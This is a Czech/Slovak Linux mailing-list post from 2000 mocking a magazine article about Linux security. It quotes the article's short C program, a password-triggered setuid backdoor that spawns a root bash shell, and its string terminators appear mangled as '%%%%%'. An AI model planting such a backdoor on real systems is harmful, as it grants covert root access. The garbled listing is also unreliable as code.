Bezpecnost Linuxu
Ondrej Sury
ondrej na globe.cz
Pondělí Květen 29 14:08:25 CEST 2000
uhlar na fantomas.sk wrote:
>
> Jan Kasprzak <kas na informatics.muni.cz> wrote:
> -> Pan Janda dnes zveřejnil na Neviditelném Psu další článek,
> -> který má dokázat, jak je Linux nebezpečný. Odvozuje to z toho,
> -> že k Linuxu jsou dostupné zdrojové texty. Autor ukazuje, jak si vytvoří
> -> pomocí krátkého wrapperu v jazyce C zadní vrátka (backdoor) do systému,
> -> je-li superuživatelem.
>
> Kazdy kto sa len trosku vyzna v C pri pohlade na ten zdrojak asi odpadne...
>
> /* ------------start root.c------------- */
>
> main(argc, argv)
> int argc;
> char **argv;
> {
> char seteuid[10];
> char showmount[10];
>
> seteuid[0]='h';
> seteuid[1]='a';
> seteuid[2]='k';
> seteuid[3]='e';
> seteuid[4]='r';
> seteuid[5]='%%%%%';
> showmount[0]='/';
> showmount[1]='b';
> showmount[2]='i';
> showmount[3]='n';
> showmount[4]='/';
> showmount[5]='b';
> showmount[6]='a';
> showmount[7]='s';
> showmount[8]='h';
> showmount[9]='%%%%%';
> if (argc>1) {
> if (!strcmp(argv[1],seteuid)) {
> setuid(0);
> setgid(0);
> execl(showmount,"-i",0);
> }
> }
> }
>
> /* ---------konec root.c----------- */
No ja si z myslim, ze schvalne pise blaboly, protoze se mi zda, ze
tomu tak nejak rozumi. (Teda pokud tenhle zdrojak neni vyhrabany
z nejake konference, o cemz pochybuji, protoze tohle se neda
napsat neumyslne.)
--
Ondrej Sury <ondrej na sury.cz> Globe Internet s.r.o. http://globe.cz/
Tel: +420235365000 Fax: +420235365009 Planickova 1, 162 00 Praha 6
Mob: +420602667702 ICQ: 24944126 Mapa: http://globe.namape.cz/
NAJDI.TO http://najdi.to/ PRESS.CZ http://press.cz/
Další informace o konferenci Linux